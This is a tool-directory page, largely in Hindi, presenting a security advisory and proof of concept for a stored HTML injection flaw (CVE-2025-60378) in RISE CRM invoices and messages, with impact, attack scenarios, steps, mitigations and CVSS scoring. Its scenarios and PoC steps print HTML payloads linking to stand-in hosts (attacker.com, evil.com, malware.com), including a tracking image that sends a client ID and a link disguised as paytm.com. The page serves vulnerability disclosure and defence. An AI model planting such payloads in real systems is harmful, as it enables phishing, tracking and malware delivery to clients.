Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-60378 — स्टोर्ड HTML इंजेक्शन के लिए प्रूफ ऑफ कॉन्सेप्ट RISE CRM में, यह प्रदर्शित करता है कि प्रमाणित उपयोगकर्ता इनवॉइस और संदेशों में दुर्भावनापूर्ण HTML कैसे इंजेक्ट कर सकते हैं, जिससे स्वचालित ईमेल और PDF के माध्यम से फ़िशिंग और मैलवेयर वितरण हो सकता है। | Kitploit
उपकरण/GitHubGitHub/ajansha/cve-2025-60378
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणफिशिंगवेब सुरक्षालर्निंग और शिक्षा
GitHubajansha/cve-2025-60378

CVE-2025-60378

स्टोर्ड HTML इंजेक्शन के लिए प्रूफ ऑफ कॉन्सेप्ट RISE CRM में, यह प्रदर्शित करता है कि प्रमाणित उपयोगकर्ता इनवॉइस और संदेशों में दुर्भावनापूर्ण HTML कैसे इंजेक्ट कर सकते हैं, जिससे स्वचालित ईमेल और PDF के माध्यम से फ़िशिंग और मैलवेयर वितरण हो सकता है।

रिपॉजिटरी देखें
611 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-60378: RISE Ultimate Project Manager & CRM में संग्रहीत HTML इंजेक्शन

⚠️ सुरक्षा सलाह
इनवॉइस, मैसेजिंग और स्वचालित संचार को प्रभावित करने वाली एक गंभीर संग्रहीत HTML इंजेक्शन भेद्यता

CVE Severity CVSS Product


📋 अवलोकन

RISE Ultimate Project Manager & CRM में एक गंभीर संग्रहीत HTML इंजेक्शन भेद्यता खोजी गई है जो प्रमाणित उपयोगकर्ताओं को इनवॉइस लाइन आइटम, क्लाइंट नोट्स और मैसेजिंग मॉड्यूल में दुर्भावनापूर्ण HTML इंजेक्ट करने की अनुमति देती है। यह इंजेक्ट की गई सामग्री डेटाबेस में बनी रहती है और स्वचालित रूप से क्लाइंट-सामना वाले ईमेल, PDF और चैट संचार में प्रस्तुत की जाती है, जिससे बड़े पैमाने पर फ़िशिंग हमले, व्यावसायिक ईमेल समझौता और ईमेल/PDF-आधारित मैलवेयर वितरण संभव होता है।

🎯 प्रभावित संस्करण

  • उत्पाद: RISE - Ultimate Project Manager & CRM
  • कमजोर संस्करण: < 3.9.4
  • सुधारित संस्करण: 3.9.4+
  • 🔍 भेद्यता विवरण

    विशेषतामान
    CVE IDCVE-2025-60378
    प्रकारसंग्रहीत HTML इंजेक्शन
    CWECWE-79
    हमला वेक्टरनेटवर्क/रिमोट
    प्रमाणीकरणआवश्यक (निम्न विशेषाधिकार)
    उपयोगकर्ता सहभागिताकोई नहीं
    गंभीरताउच्च
    CVSS v3.18.1 - उच्च
    खोजकर्ताAjansha Shankar

    विवरण

    RISE CRM इनवॉइस, संदेश और क्लाइंट नोट्स सहित कई उपयोगकर्ता-संपादन योग्य फ़ील्ड में HTML सामग्री को ठीक से सैनिटाइज़ और एन्कोड करने में विफल रहता है। जब प्रमाणित उपयोगकर्ता इन फ़ील्ड में HTML पेलोड इंजेक्ट करते हैं, तो सामग्री पर्याप्त फ़िल्टरिंग के बिना डेटाबेस में संग्रहीत हो जाती है। इसके बाद, यह दुर्भावनापूर्ण HTML स्वचालित रूप से क्लाइंट-सामना वाले ईमेल, PDF अनुलग्नकों और मैसेजिंग/चैट मॉड्यूल में उचित एस्केपिंग के बिना प्रस्तुत किया जाता है। आवर्ती इनवॉइस और स्वचालित मैसेजिंग एक साथ कई प्राप्तकर्ताओं को दुर्भावनापूर्ण सामग्री वितरित करके हमले को बढ़ाते हैं।

    प्रभावित घटक

    • ✗ इनवॉइस लाइन आइटम (विवरण फ़ील्ड)
    • ✗ क्लाइंट नोट/मैसेजिंग मॉड्यूल
    • ✗ चैट और मैसेजिंग सिस्टम
    • ✗ क्लाइंट स्टेटमेंट जनरेशन मॉड्यूल
    • ✗ स्वचालित ईमेल सिस्टम (आवर्ती इनवॉइस, अनुस्मारक)
    • ✗ PDF अनुलग्नक

    मूल कारण

    • ❌ इनवॉइस, संदेश और क्लाइंट नोट फ़ील्ड पर अपर्याप्त इनपुट सैनिटाइज़ेशन
    • ❌ ईमेल टेम्पलेट्स और PDF जनरेशन में HTML आउटपुट एन्कोडिंग की कमी
    • ❌ डेटाबेस में संग्रहीत करने से पहले कोई सामग्री सत्यापन नहीं
    • ❌ क्लाइंट संचार में HTML/JavaScript पर प्रतिबंधों की कमी
    • ❌ स्वचालित सिस्टम अतिरिक्त फ़िल्टरिंग के बिना अमान्य सामग्री वितरित करते हैं

    💥 प्रभाव

    सुरक्षा निहितार्थ

    • 🎣 बड़े पैमाने पर फ़िशिंग: इंजेक्ट की गई सामग्री वैध संचार का रूप धारण कर सकती है और कई क्लाइंट्स को हमलावर-नियंत्रित साइटों पर पुनर्निर्देशित कर सकती है
    • 💼 व्यावसायिक ईमेल समझौता: क्लाइंट्स को भेजे गए दुर्भावनापूर्ण इनवॉइस और संदेश विश्वसनीय स्रोत से आए हुए प्रतीत होते हैं
    • 💬 समझौता किया गया मैसेजिंग: चैट/मैसेजिंग में दुर्भावनापूर्ण पेलोड सीधे टीम सदस्यों और क्लाइंट्स तक पहुँचते हैं
    • 🦠 मैलवेयर वितरण: एम्बेडेड दुर्भावनापूर्ण लिंक या iframes ईमेल/PDF/मैसेजिंग के माध्यम से मैलवेयर वितरित करते हैं
    • 🔄 स्वचालित हमला वितरण: आवर्ती इनवॉइस और स्वचालित संदेश मैन्युअल हस्तक्षेप के बिना कई प्राप्तकर्ताओं तक पेलोड पहुँचाना सुनिश्चित करते हैं
    • 👥 बहु-वेक्टर हमला: संयुक्त ईमेल, PDF और मैसेजिंग हमले की सतहें सफल समझौते की दर बढ़ाती हैं

    CIA ट्रायड मूल्यांकन

    कारकप्रभावस्पष्टीकरण
    गोपनीयता🔴 उच्चक्लाइंट क्रेडेंशियल और संवेदनशील डेटा फ़िशिंग के माध्यम से एकत्र किए जा सकते हैं
    अखंडता🔴 उच्चदुर्भावनापूर्ण सामग्री संचार और व्यावसायिक संबंधों की धारणा को बदल सकती है
    उपलब्धता🟡 निम्नसिस्टम उपलब्धता पर सीमित प्रत्यक्ष प्रभाव

    वास्तविक-विश्व हमले के परिदृश्य

    परिदृश्य 1: इनवॉइस-आधारित फ़िशिंग अभियान

    निम्न-विशेषाधिकार वाला प्रोजेक्ट मैनेजर एक्सेस वाला हमलावर दुर्भावनापूर्ण HTML के साथ एक इनवॉइस बनाता है:

    root@kitploit:~
    <a href="https://attacker.com/fake-payment">Click here to view payment status</a>
    

    इनवॉइस स्वचालित ईमेल के माध्यम से 100+ क्लाइंट्स को भेजा जाता है। सभी क्लाइंट्स को एक वैध इनवॉइस प्राप्त होता है जो उन्हें फ़िशिंग साइट पर निर्देशित करता है। हमलावर एक साथ कई पीड़ितों से क्रेडेंशियल एकत्र करता है।

    परिदृश्य 2: मैसेजिंग-आधारित हमला

    एक हमलावर क्लाइंट संदेश में दुर्भावनापूर्ण HTML इंजेक्ट करता है:

    root@kitploit:~
    <img src="https://attacker.com/track.gif?user=CLIENT_ID">
    <a href="https://malware.com">Download Updated Project Files</a>
    

    सभी टीम सदस्यों और क्लाइंट्स को उनके चैट में संदेश प्राप्त होता है, और वे मैलवेयर डाउनलोड करने के लिए लिंक पर क्लिक करते हैं।

    परिदृश्य 3: आवर्ती इनवॉइस मैलवेयर वितरण

    एक हमलावर मैलवेयर वितरण पेलोड के साथ एक आवर्ती इनवॉइस स्थापित करता है। हर महीने, क्लाइंट्स को स्वचालित रूप से एम्बेडेड दुर्भावनापूर्ण सामग्री वाले इनवॉइस प्राप्त होते हैं, जो एक स्थायी हमला वेक्टर प्रदान करता है।

    🧪 प्रमाण-अवधारणा

    पर्यावरण सेटअप

    • इनवॉइस/संदेश निर्माण अनुमतियों के साथ RISE CRM एडमिन पैनल तक पहुँच
    • 3.9.4 से पहले का कोई भी संस्करण

    PoC चरण

    चरण 1: इनवॉइस या संदेश निर्माण तक पहुँच

    root@kitploit:~
    Navigate to: RISE CRM Dashboard → Invoices/Messages → Create New
    

    चरण 2: विवरण/संदेश फ़ील्ड में HTML पेलोड इंजेक्ट करें

    root@kitploit:~
    <a href="https://attacker.com">Click here to view invoice</a>
    

    चरण 3: पुनर्निर्देशन के साथ दुर्भावनापूर्ण छवि जोड़ें

    root@kitploit:~
    <a href="https://evil.com" target="_blank">
      <img src="https://media1.giphy.com/media/v1.Y2lkPTc5MGI3NjExbzg4OXRuZHd4MXF0bWNqa3BvN2pzbWdqMzRxZHc5bHJpbXpucHNtaSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/9PgvV8ale90lQwfQTZ/giphy.gif">
    </a>
    

    चरण 4: भ्रामक स्टाइलिंग पेलोड जोड़ें

    root@kitploit:~
    <h1><font color=red>Visit Our New WebSite</font></h1>
    <h3><mark><a href="https://evil.com">https://www.paytm.com/</a></mark></h3>
    

    चरण 5: आवर्ती वितरण कॉन्फ़िगर करें

    • रिकॉर्ड सहेजें
    • "Recurring" विकल्प सक्षम करें (यदि इनवॉइस/संदेशों के लिए उपलब्ध हो)
    • आवृत्ति सेट करें (साप्ताहिक, मासिक, आदि)
    • सिस्टम स्वचालित रूप से सभी प्रासंगिक क्लाइंट्स को भेजता है

    चरण 6: हमला वेक्टर सत्यापित करें

    • क्लाइंट ईमेल इनबॉक्स जाँचें
    • क्लाइंट मैसेजिंग/चैट जाँचें
    • PDF अनुलग्नक खोलें
    • सभी चैनलों में प्रस्तुत दुर्भावनापूर्ण HTML का निरीक्षण करें

    अपेक्षित परिणाम

    ✅ इंजेक्ट किया गया HTML बिना एस्केपिंग के ईमेल, PDF और मैसेजिंग में प्रस्तुत होता है ✅ लिंक क्लिक करने योग्य हैं और हमलावर साइटों पर पुनर्निर्देशित करते हैं ✅ छवियाँ हमलावर-नियंत्रित सर्वरों से लोड होती हैं ✅ सामग्री सभी भविष्य के क्लाइंट संचारों में बनी रहती है ✅ आवर्ती वितरण स्वचालित रूप से कई प्राप्तकर्ताओं तक पहुँचता है

    🛡️ शमन

    अंतिम उपयोगकर्ताओं के लिए

    1. ✅ तुरंत अपग्रेड करें: RISE CRM v3.9.4 या बाद के संस्करण में अपडेट करें
    2. 🔍 सभी रिकॉर्ड का ऑडिट करें: संदिग्ध HTML सामग्री के लिए हाल के इनवॉइस, संदेश और क्लाइंट नोट्स की समीक्षा करें
    3. ⚠️ क्लाइंट सूचना: यदि संदिग्ध इनवॉइस या संदेश भेजे गए थे तो सभी क्लाइंट्स को सतर्क करें
    4. 🔄 क्रेडेंशियल रीसेट: यदि क्लाइंट्स ने लिंक पर क्लिक किया है तो उन्हें पासवर्ड बदलने की सलाह दें
    5. 📝 गतिविधि की निगरानी करें: अनधिकृत इनवॉइस/संदेश संशोधनों के लिए ऑडिट लॉग जाँचें
    6. 🔐 आवर्ती अक्षम करें: पैच लागू होने तक आवर्ती इनवॉइस/संदेश अस्थायी रूप से अक्षम करें

    📚 संदर्भ

    • CWE-79: Improper Neutralization of Input During Web Page Generation
    • OWASP: Cross-site Scripting (XSS)
    • OWASP: HTML Injection
    • OWASP: Output Encoding
    • CVE-2025-60378 Official Entry

    📅 समयरेखा

    तिथिघटना
    TBDभेद्यता खोजी गई
    TBDविक्रेता को सूचित किया गया
    TBDCVE-2025-60378 निर्धारित किया गया
    TBDपैच जारी किया गया (v3.9.4)
    TBDसार्वजनिक प्रकटीकरण

    👤 श्रेय

    खोजकर्ता: Ajansha Shankar

    LinkedIn: https://www.linkedin.com/in/ajansha-shankar/

    📊 CVSS v3.1 मूल्यांकन

    वेक्टर: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

    स्कोर: 8.1 (उच्च)

    विवरण:

    • हमला वेक्टर (AV:N): नेटवर्क - रिमोट से शोषण किया जा सकता है
    • हमला जटिलता (AC:L): निम्न - कोई विशेष शर्तें आवश्यक नहीं
    • आवश्यक विशेषाधिकार (PR:L): निम्न - बुनियादी प्रोजेक्ट मैनेजर विशेषाधिकारों वाले प्रमाणित उपयोगकर्ता की आवश्यकता है
    • उपयोगकर्ता सहभागिता (UI:N): कोई नहीं - कोई उपयोगकर्ता सहभागिता आवश्यक नहीं; स्वचालित सिस्टम पेलोड वितरित करते हैं
    • दायरा (S:U): अपरिवर्तित - प्रभाव कमजोर घटक तक सीमित है
    • गोपनीयता (C:H): उच्च - कई क्लाइंट्स को फ़िशिंग के माध्यम से संभावित क्रेडेंशियल चोरी
    • अखंडता (I:H): उच्च - दुर्भावनापूर्ण सामग्री इंजेक्ट की जा सकती है और कई प्राप्तकर्ताओं को वितरित की जा सकती है
    • उपलब्धता (A:N): कोई नहीं - सिस्टम उपलब्धता पर कोई प्रभाव नहीं

    📧 संपर्क

    प्रश्नों या अतिरिक्त जानकारी के लिए:

    • LinkedIn: https://www.linkedin.com/in/ajansha-shankar/

    ⭐ यदि यह शोध सहायक था, तो कृपया इस रिपॉजिटरी को स्टार करने पर विचार करें!

    🔔 अपडेट रहें: इस और भविष्य के सुरक्षा शोध पर अपडेट के लिए इस रिपॉजिटरी को देखें।

    • CVE-2025-60374 - Stored XSS in Perfex CRM Chatbot
    • CVE-2025-55903 - Stored HTML Injection in Perfex CRM Invoices
    • CVE-2025-60375 - Authentication Bypass in Perfex CRM
    टूल डाउनलोड करें